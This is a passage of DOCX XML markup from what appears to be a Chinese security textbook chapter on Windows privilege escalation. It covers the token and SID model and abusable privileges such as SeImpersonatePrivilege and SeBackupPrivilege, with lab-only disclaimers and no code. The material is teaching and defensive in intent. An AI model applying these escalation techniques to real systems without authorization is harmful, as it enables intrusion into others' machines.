        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">框架（Privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">战术）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境下的提权技术被概括在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Privilege Escalation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术（TA0004）中，结合检测技术参考可帮助蓝队构建基于行为的检测规则，理解攻击者可能利用的各类权限提升技术。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CIS Benchmarks for Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：互联网安全中心（Center</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Internet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Security）发布的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基准提供了系统加固的细致建议，其中与提权防御直接相关的部分包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID/SGID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计、sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置规范、内核参数加固等，适合蓝队参考实施。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="285"/>
    <w:bookmarkEnd w:id="286"/>
    <w:bookmarkStart w:id="296" w:name="windows-提权与-ad-入门"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">16 Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">入门</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="287" w:name="windows-提权与服务配置错误"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">16.1 Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权与服务配置错误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本小节内容依赖以下前置知识：Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程与线程的基本概念、用户态与内核态的区分——这些已在《从位到物联》第13–18章（汇编、栈帧、进程与内存管理）中建立基础，此处直接使用；提权的一般思想（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“从低权限访问控制配置错误获得高权限”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）已在本书第15章（Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权）中详细阐述，本章将同一思想迁移到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境。本节所述的技术与命令仅适用于读者在自建隔离实验室或官方授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox、TryHackMe、以及本章后续靶机）上操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作仅限在您自己搭建的、与生产网络及公网完全隔离的实验环境，或在您已获得书面授权的靶机/靶场上执行。未经授权访问、修改或提权他人计算机系统属于违法行为。本节提供的枚举命令为通用语法，具体输出和可利用性因操作系统版本、补丁级别和系统配置而异（均标注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）。所有配置错误利用思路均为概念级示意（标注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">③），旨在帮助理解防御原理，不可直接用作针对在野系统的武器化攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从攻击者的视角看，在获得了一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">低权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell（例如通过第17章所述的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话，或通过一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用漏洞获得的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IIS APPPOOL\DefaultAppPool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份）之后，下一步的核心目标就是实现提权（privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">escalation），从普通用户权限晋升为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（本地系统账户）或管理员权限。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账户是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中权限最高的本地身份，其在本地机器上的权力甚至超过管理员（Administrator），能够访问任何系统文件、进程和内核对象。从防御者的视角看，理解提权的原理至关重要：攻击者之所以能够成功提权，往往是因为违反了最小权限原则（Principle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of Least </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege）——一个本应以低权限运行的服务或进程，由于配置错误或被错误赋予了过高权限，从而成为了攻击者劫持和利用的跳板。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="287"/>
    <w:bookmarkStart w:id="288" w:name="windows-权限模型与令牌token机制"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限模型与令牌（Token）机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权，必须首先理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的权限模型。与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID（Set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> User </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID）机制或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则不同，Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的权限控制是围绕“访问令牌（Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Token）”构建的①。每当一个用户在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统中成功登录，系统便为其创建一个访问令牌。这个令牌包含了该用户账户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SID（Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifier，安全标识符）、所属组的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列表、以及该用户或组被赋予的特权（privileges）列表。Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核在进行任何安全性对象（文件、注册表项、进程、线程等）的访问检查时，会对比该令牌中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL（Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Control </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">List，访问控制列表）中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACE（Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Control </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Entry，访问控制项），并检查令牌中是否启用了所需的特权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有两类重要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和特权概念，构成了提权的理论基础：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">用户与组的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：最关键的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">S-1-5-18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">System，即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">S-1-5-19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service，一个权限较低的本地服务身份）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">S-1-5-20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service，用于以计算机身份访问网络的服务身份）。如果攻击者的进程令牌中能够被注入或伪造一个高权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SID，或者攻击者能够冒充一个拥有高权限令牌的进程，即可实现提权。这种攻击在概念上被称为“令牌窃取（Token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Theft）”或“令牌模拟（Token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Impersonation）”③，其核心思想是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">特权允许一个服务账户（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）在用户连接时模拟该用户的安全上下文。如果该服务被攻陷，攻击者可以利用此特权模拟一个拥有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份的令牌（例如通过诱骗</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RPCSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务或利用命名管道），从而将自己的线程升级为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">特权（Privileges）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：特权是授予账户执行特定系统操作的权限，独立于对象的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL。例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeShutdownPrivilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">允许关闭系统，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeDebugPrivilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">允许调试其他进程并读取其内存（这是获取高权限令牌的一个重要途径，但通常仅默认授予</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator）。对于提权而言，几个特别危险的特权包括：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（允许模拟已认证的用户，如上所述）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeAssignPrimaryTokenPrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（允许为进程分配主令牌）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeBackupPrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（允许绕过所有文件系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来读取任意文件，包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SAM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注册表蜂巢②）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeRestorePrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（允许绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">写入任意文件）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeBackupPrivilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SeRestorePrivilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认授予</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup Operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组，但攻击者若在一个被攻陷的服务账户中发现了这些特权，就可以通过读取和替换关键系统文件来进行提权。利用拥有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
